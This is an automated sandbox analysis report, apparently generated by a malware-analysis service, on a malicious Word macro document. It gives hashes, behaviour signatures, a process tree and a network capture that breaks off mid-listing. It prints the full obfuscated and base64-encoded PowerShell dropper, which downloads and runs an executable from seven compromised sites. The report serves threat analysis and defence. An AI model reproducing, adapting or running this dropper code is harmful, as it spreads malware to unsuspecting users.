Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/05/2024, 12:37 UTC

General

  • Target

    5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc

  • Size

    154KB

  • MD5

    5f1bbe19a2333cb402ac624a46014f28

  • SHA1

    6bcd62ad194559166fbd621ff40d5069cc5b2d38

  • SHA256

    e203577dadb325bd364b0a6609b5aa2b4df457ba261810b3e5416950dff54c8f

  • SHA512

    089efbe2850665db146361b3cf64f9701e93d01dd270f500e0a0206fbdffcd5b8a86cda85a3a08c9af70c66fad01245026237bcf7105f4ba9cbcca8356e7f64c

  • SSDEEP

    1536:cQYIQYjrdi1Ir77zOH98Wj2gpngB+a94+dRXalfAW66uud+BbN+rEw1:vrfrzOH98ipgXRE66uuoBsEw1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$Y1u9kdm=('Yh'+('e0'+'qow'));&('new'+'-item') $enV:USeRPRoFile\m4Obyxb\O2ee0Qk\ -itemtype diRecTorY;[Net.ServicePointManager]::"se`cUr`I`Ty`pRoTOcol" = (('t'+'ls')+('12,'+' '+'tls1')+('1,'+' ')+('tl'+'s'));$Joc_rvg = ('W'+('_c'+'1')+('yy'+'z'));$Ty0lqd3=('C'+'d'+('c'+'3bi7'));$C43scuh=$env:userprofile+(('{0}M4ob'+'y'+'xb{0'+'}O2ee0'+'qk{0}') -F[Char]92)+$Joc_rvg+(('.'+'ex')+'e');$Lldqtcy=('D6'+('j_'+'nu')+'l');$Awcx2cw=&('n'+'ew-obje'+'c'+'t') nET.weBcLiENT;$Rf9snso=('ht'+('t'+'p://')+'g'+'i'+('v'+'in')+'gt'+'h'+'a'+('nksd'+'a')+'il'+'y'+'.'+'c'+('o'+'m/we'+'b/')+('V'+'K/')+('*'+'http')+':/'+'/'+('t'+'skge')+('a'+'r.co')+'m'+('/wp-c'+'on'+'t')+('ent'+'/upl'+'oads/2017')+('/'+'Fo/*'+'h')+('tt'+'p:/')+'/'+('d'+'uol')+('if'+'e-p')+('a'+'rtne')+('r'+'.c')+('o'+'m/wp-c')+'on'+('t'+'ent/')+'p'+('E'+'/*')+('htt'+'p:')+('//p'+'on'+'tu')+('ri'+'basc'+'he')+('t'+'cr')+'i'+('sti'+'a')+'n'+('ion'+'ut')+('.com'+'/wp')+('-'+'ad')+('mi'+'n/G/')+'*h'+('ttp'+'s:')+('/'+'/mrveg'+'gy.')+'c'+('om/e'+'rros/'+'t')+'S1'+('/*'+'http:'+'/')+('/if'+'armer.'+'com.br/_'+'_'+'MACO')+'S'+'X'+'/'+('2w4'+'/*h'+'tt')+('p:/'+'/')+('uni'+'t')+'ed'+('d'+'ataba')+('s'+'e.n'+'et/w'+'p-adm')+'i'+'n/'+('t'+'f/'))."SpL`iT"([char]42);$Bcgxfax=(('Lg6'+'n')+'m'+'6i');foreach($Vafutcz in $Rf9snso){try{$Awcx2cw."DOw`Nl`OA`DFILe"($Vafutcz, $C43scuh);$C1jnvi9=('Z4'+('hv'+'5')+'3u');If ((.('Get'+'-Ite'+'m') $C43scuh)."L`e`NgtH" -ge 30822) {&('Invo'+'k'+'e-Ite'+'m')($C43scuh);$U10cihq=(('G'+'amh')+('k'+'5k'));break;$Q7yl9z5=(('Mx'+'n5c')+'ay')}}catch{}}$Ivteku7=(('V'+'1lh')+'w'+'rz')
URLs
exe.dropper

http://givingthanksdaily.com/web/VK/

exe.dropper

http://tskgear.com/wp-content/uploads/2017/Fo/

exe.dropper

http://duolife-partner.com/wp-content/pE/

exe.dropper

http://ponturibaschetcristianionut.com/wp-admin/G/

exe.dropper

https://mrveggy.com/erros/tS1/

exe.dropper

http://ifarmer.com.br/__MACOSX/2w4/

exe.dropper

http://uniteddatabase.net/wp-admin/tf/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5f1bbe19a2333cb402ac624a46014f28_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1692
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e JABZADEAdQA5AGsAZABtAD0AKAAnAFkAaAAnACsAKAAnAGUAMAAnACsAJwBxAG8AdwAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBTAGUAUgBQAFIAbwBGAGkAbABlAFwAbQA0AE8AYgB5AHgAYgBcAE8AMgBlAGUAMABRAGsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBjAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAVQByAGAASQBgAFQAeQBgAHAAUgBvAFQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACgAJwAxADIALAAnACsAJwAgACcAKwAnAHQAbABzADEAJwApACsAKAAnADEALAAnACsAJwAgACcAKQArACgAJwB0AGwAJwArACcAcwAnACkAKQA7ACQASgBvAGMAXwByAHYAZwAgAD0AIAAoACcAVwAnACsAKAAnAF8AYwAnACsAJwAxACcAKQArACgAJwB5AHkAJwArACcAegAnACkAKQA7ACQAVAB5ADAAbABxAGQAMwA9ACgAJwBDACcAKwAnAGQAJwArACgAJwBjACcAKwAnADMAYgBpADcAJwApACkAOwAkAEMANAAzAHMAYwB1AGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ATQA0AG8AYgAnACsAJwB5ACcAKwAnAHgAYgB7ADAAJwArACcAfQBPADIAZQBlADAAJwArACcAcQBrAHsAMAB9ACcAKQAgAC0ARgBbAEMAaABhAHIAXQA5ADIAKQArACQASgBvAGMAXwByAHYAZwArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEwAbABkAHEAdABjAHkAPQAoACcARAA2ACcAKwAoACcAagBfACcAKwAnAG4AdQAnACkAKwAnAGwAJwApADsAJABBAHcAYwB4ADIAYwB3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAEUAVAAuAHcAZQBCAGMATABpAEUATgBUADsAJABSAGYAOQBzAG4AcwBvAD0AKAAnAGgAdAAnACsAKAAnAHQAJwArACcAcAA6AC8ALwAnACkAKwAnAGcAJwArACcAaQAnACsAKAAnAHYAJwArACcAaQBuACcAKQArACcAZwB0ACcAKwAnAGgAJwArACcAYQAnACsAKAAnAG4AawBzAGQAJwArACcAYQAnACkAKwAnAGkAbAAnACsAJwB5ACcAKwAnAC4AJwArACcAYwAnACsAKAAnAG8AJwArACcAbQAvAHcAZQAnACsAJwBiAC8AJwApACsAKAAnAFYAJwArACcASwAvACcAKQArACgAJwAqACcAKwAnAGgAdAB0AHAAJwApACsAJwA6AC8AJwArACcALwAnACsAKAAnAHQAJwArACcAcwBrAGcAZQAnACkAKwAoACcAYQAnACsAJwByAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AJwArACcAdAAnACkAKwAoACcAZQBuAHQAJwArACcALwB1AHAAbAAnACsAJwBvAGEAZABzAC8AMgAwADEANwAnACkAKwAoACcALwAnACsAJwBGAG8ALwAqACcAKwAnAGgAJwApACsAKAAnAHQAdAAnACsAJwBwADoALwAnACkAKwAnAC8AJwArACgAJwBkACcAKwAnAHUAbwBsACcAKQArACgAJwBpAGYAJwArACcAZQAtAHAAJwApACsAKAAnAGEAJwArACcAcgB0AG4AZQAnACkAKwAoACcAcgAnACsAJwAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAcAAtAGMAJwApACsAJwBvAG4AJwArACgAJwB0ACcAKwAnAGUAbgB0AC8AJwApACsAJwBwACcAKwAoACcARQAnACsAJwAvACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAOgAnACkAKwAoACcALwAvAHAAJwArACcAbwBuACcAKwAnAHQAdQAnACkAKwAoACcAcgBpACcAKwAnAGIAYQBzAGMAJwArACcAaABlACcAKQArACgAJwB0ACcAKwAnAGMAcgAnACkAKwAnAGkAJwArACgAJwBzAHQAaQAnACsAJwBhACcAKQArACcAbgAnACsAKAAnAGkAbwBuACcAKwAnAHUAdAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAC8ARwAvACcAKQArACcAKgBoACcAKwAoACcAdAB0AHAAJwArACcAcwA6ACcAKQArACgAJwAvACcAKwAnAC8AbQByAHYAZQBnACcAKwAnAGcAeQAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvAGUAJwArACcAcgByAG8AcwAvACcAKwAnAHQAJwApACsAJwBTADEAJwArACgAJwAvACoAJwArACcAaAB0AHQAcAA6ACcAKwAnAC8AJwApACsAKAAnAC8AaQBmACcAKwAnAGEAcgBtAGUAcgAuACcAKwAnAGMAbwBtAC4AYgByAC8AXwAnACsAJwBfACcAKwAnAE0AQQBDAE8AJwApACsAJwBTACcAKwAnAFgAJwArACcALwAnACsAKAAnADIAdwA0ACcAKwAnAC8AKgBoACcAKwAnAHQAdAAnACkAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAoACcAdQBuAGkAJwArACcAdAAnACkAKwAnAGUAZAAnACsAKAAnAGQAJwArACcAYQB0AGEAYgBhACcAKQArACgAJwBzACcAKwAnAGUALgBuACcAKwAnAGUAdAAvAHcAJwArACcAcAAtAGEAZABtACcAKQArACcAaQAnACsAJwBuAC8AJwArACgAJwB0ACcAKwAnAGYALwAnACkAKQAuACIAUwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABCAGMAZwB4AGYAYQB4AD0AKAAoACcATABnADYAJwArACcAbgAnACkAKwAnAG0AJwArACcANgBpACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFYAYQBmAHUAdABjAHoAIABpAG4AIAAkAFIAZgA5AHMAbgBzAG8AKQB7AHQAcgB5AHsAJABBAHcAYwB4ADIAYwB3AC4AIgBEAE8AdwBgAE4AbABgAE8AQQBgAEQARgBJAEwAZQAiACgAJABWAGEAZgB1AHQAYwB6ACwAIAAkAEMANAAzAHMAYwB1AGgAKQA7ACQAQwAxAGoAbgB2AGkAOQA9ACgAJwBaADQAJwArACgAJwBoAHYAJwArACcANQAnACkAKwAnADMAdQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAQwA0ADMAcwBjAHUAaAApAC4AIgBMAGAAZQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAwADgAMgAyACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEMANAAzAHMAYwB1AGgAKQA7ACQAVQAxADAAYwBpAGgAcQA9ACgAKAAnAEcAJwArACcAYQBtAGgAJwApACsAKAAnAGsAJwArACcANQBrACcAKQApADsAYgByAGUAYQBrADsAJABRADcAeQBsADkAegA1AD0AKAAoACcATQB4ACcAKwAnAG4ANQBjACcAKQArACcAYQB5ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQB2AHQAZQBrAHUANwA9ACgAKAAnAFYAJwArACcAMQBsAGgAJwApACsAJwB3ACcAKwAnAHIAegAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2384

Network

  • flag-us
    DNS
    roaming.officeapps.live.com
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    uks-azsc-000.roaming.officeapps.live.com
    uks-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    IN A
    52.109.28.47
  • flag-gb
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    WINWORD.EXE
    Remote address:
    52.109.28.47:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_595
    X-OfficeVersion: 16.0.17711.30575
    X-OfficeCluster: uks-000.roaming.officeapps.live.com
    X-CorrelationId: 6c9ddd84-f482-455c-a93c-ab08d56b1c7a
    X-Powered-By: ASP.NET
    Date: Mon, 20 May 2024 12:37:40 GMT
    Content-Length: 654
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    47.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    47.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    46.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    46.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    14.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    givingthanksdaily.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    givingthanksdaily.com
    IN A
    Response
    givingthanksdaily.com
    IN A
    66.96.134.60
  • flag-us
    GET
    http://givingthanksdaily.com/web/VK/
    powershell.exe
    Remote address:
    66.96.134.60:80
    Request
    GET /web/VK/ HTTP/1.1
    Host: givingthanksdaily.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Mon, 20 May 2024 12:37:42 GMT
    Content-Type: text/html
    Content-Length: 867
    Connection: keep-alive
    Server: Apache
    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
    Accept-Ranges: bytes
    Expires: Mon, 20 May 2024 12:37:51 GMT
    Age: 1
  • flag-us
    DNS
    tskgear.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    tskgear.com
    IN A
    Response
    tskgear.com
    IN A
    103.197.57.20
  • flag-us
    DNS
    6.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    6.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    60.134.96.66.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    60.134.96.66.in-addr.arpa
    IN PTR
    Response
    60.134.96.66.in-addr.arpa
    IN PTR
    601349666staticeigboxnet
  • flag-my
    GET
    http://tskgear.com/wp-content/uploads/2017/Fo/
    powershell.exe
    Remote address:
    103.197.57.20:80
    Request
    GET /wp-content/uploads/2017/Fo/ HTTP/1.1
    Host: tskgear.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Mon, 20 May 2024 12:37:43 GMT
    Server: Apache/2
    Location: https://tskgear.com/wp-content/uploads/2017/Fo/
    Content-Length: 255
    Keep-Alive: timeout=2, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-my
    GET
    https://tskgear.com/wp-content/uploads/2017/Fo/
    powershell.exe
    Remote address:
    103.197.57.20:443
    Request
    GET /wp-content/uploads/2017/Fo/ HTTP/1.1
    Host: tskgear.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Mon, 20 May 2024 12:37:45 GMT
    Server: Apache/2
    X-Powered-By: PHP/8.0.30
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Location: https://tskgear.com/product/foscor-double-helical/
    Vary: User-Agent
    Content-Length: 0
    Keep-Alive: timeout=2, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-my
    GET
    https://tskgear.com/product/foscor-double-helical/
    powershell.exe
    Remote address:
    103.197.57.20:443
    Request
    GET /product/foscor-double-helical/ HTTP/1.1
    Host: tskgear.com
    Response
    HTTP/1.1 200 OK
    Date: Mon, 20 May 2024 12:37:46 GMT
    Server: Apache/2
    X-Powered-By: PHP/8.0.30
    Link: <https://tskgear.com/wp-json/>; rel="https://api.w.org/", <https://tskgear.com/wp-json/wp/v2/product/2919>; rel="alternate"; type="application/json", <https://tskgear.com/?p=2919>; rel=shortlink
    Vary: Accept-Encoding,User-Agent
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    20.57.197.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    20.57.197.103.in-addr.arpa
    IN PTR
    Response
    20.57.197.103.in-addr.arpa
    IN PTR
    da mymymarketcommy
  • flag-be
    GET
    https://www.bing.com/th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    88.221.83.184:443
    Request
    GET /th?id=OADD2.10239356736264_1E1NQW5LZ8SVSGPEK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 999
    date: Mon, 20 May 2024 12:37:45 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.b453dd58.1716208665.8a243e8
  • flag-us
    DNS
    26.35.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.35.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    184.83.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    184.83.221.88.in-addr.arpa
    IN PTR
    Response
    184.83.221.88.in-addr.arpa
    IN PTR
    a88-221-83-184deploystaticakamaitechnologiescom
  • flag-us
    DNS
    226.21.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.21.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    duolife-partner.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    duolife-partner.com
    IN A
    Response
  • flag-us
    DNS
    ponturibaschetcristianionut.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ponturibaschetcristianionut.com
    IN A
    Response
  • flag-us
    DNS
    mrveggy.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    mrveggy.com
    IN A
    Response
    mrveggy.com
    IN A
    177.12.170.95
  • flag-br
    GET
    https://mrveggy.com/erros/tS1/
    powershell.exe
    Remote address:
    177.12.170.95:443
    Request
    GET /erros/tS1/ HTTP/1.1
    Host: mrveggy.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 403 Forbidden
    Date: Mon, 20 May 2024 12:37:49 GMT
    Server: Apache
    Content-Length: 380
    Keep-Alive: timeout=5, max=500
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    DNS
    ifarmer.com.br
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ifarmer.com.br
    IN A
    Response
  • flag-us
    DNS
    uniteddatabase.net
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    uniteddatabase.net
    IN A
    Response
    uniteddatabase.net
    IN A
    173.254.237.178
  • flag-us
    DNS
    95.170.12.177.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.170.12.177.in-addr.arpa
    IN PTR
    Response
    95.170.12.177.in-addr.arpa
    IN PTR
    web-ded-218851akinghostnet
  • flag-us
    GET
    http://uniteddatabase.net/wp-admin/tf/
    powershell.exe
    Remote address:
    173.254.237.178:80
    Request
    GET /wp-admin/tf/ HTTP/1.1
    Host: uniteddatabase.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Date: Mon, 20 May 2024 12:37:49 GMT
    Server: Apache
    Location: http://uniteddatabase.net/cgi-sys/suspendedpage.cgi
    Content-Length: 235
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
  • flag-us
    GET
    http://uniteddatabase.net/cgi-sys/suspendedpage.cgi
    powershell.exe
    Remote address:
    173.254.237.178:80
    Request
    GET /cgi-sys/suspendedpage.cgi HTTP/1.1
    Host: uniteddatabase.net
    Response
    HTTP/1.1 200 OK
    Date: Mon, 20 May 2024 12:37:50 GMT
    Server: Apache
    Transfer-Encoding: chunked
    Content-Type: text/html
  • flag-us
    DNS
    178.237.254.173.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    178.237.254.173.in-addr.arpa
    IN PTR
    Response
    178.237.254.173.in-addr.arpa
    IN PTR
    serverinfoscapemediacom
  • flag-us
    DNS
    metadata.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    metadata.templates.cdn.office.net
    IN A
    Response
    metadata.templates.cdn.office.net
    IN CNAME
    templatesmetadata.office.net
    templatesmetadata.office.net
    IN CNAME
    templatesmetadata.office.net.edgekey.net
    templatesmetadata.office.net.edgekey.net
    IN CNAME
    e26769.dscb.akamaiedge.net
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.162
    e26769.dscb.akamaiedge.net
    IN A
    23.62.61.184
  • flag-nl
    GET
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    WINWORD.EXE
    Remote address:
    23.62.61.162:443
    Request
    GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: metadata.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Type: text/xml
    Server: Kestrel
    Content-Encoding: gzip
    Content-Length: 1264
    Cache-Control: max-age=139264
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Vary: Accept-Encoding
  • flag-us
    DNS
    binaries.templates.cdn.office.net
    WINWORD.EXE
    Remote address:
    8.8.8.8:53
    Request
    binaries.templates.cdn.office.net
    IN A
    Response
    binaries.templates.cdn.office.net
    IN CNAME
    binaries.templates.cdn.office.net.edgesuite.net
    binaries.templates.cdn.office.net.edgesuite.net
    IN CNAME
    a1847.dscg2.akamai.net
    a1847.dscg2.akamai.net
    IN A
    2.17.251.23
    a1847.dscg2.akamai.net
    IN A
    2.17.251.17
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp01840907.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 43653
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
    Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
    ETag: 0x8D36AC84F8E1FB0
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 333d986d-301e-008a-4b97-a0d19b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851216.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 34816
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: YoYxJM3NoTXswOcieCy4iA==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC4993E3EB5
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 15d55d85-901e-0125-6d97-a0e68f000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851220.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31482
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 8Q35ApgPHVvuqWssZoQIpw==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC499D1A9F8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 62995edb-d01e-0069-0697-a067c5000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851219.cab HTTP/1.1
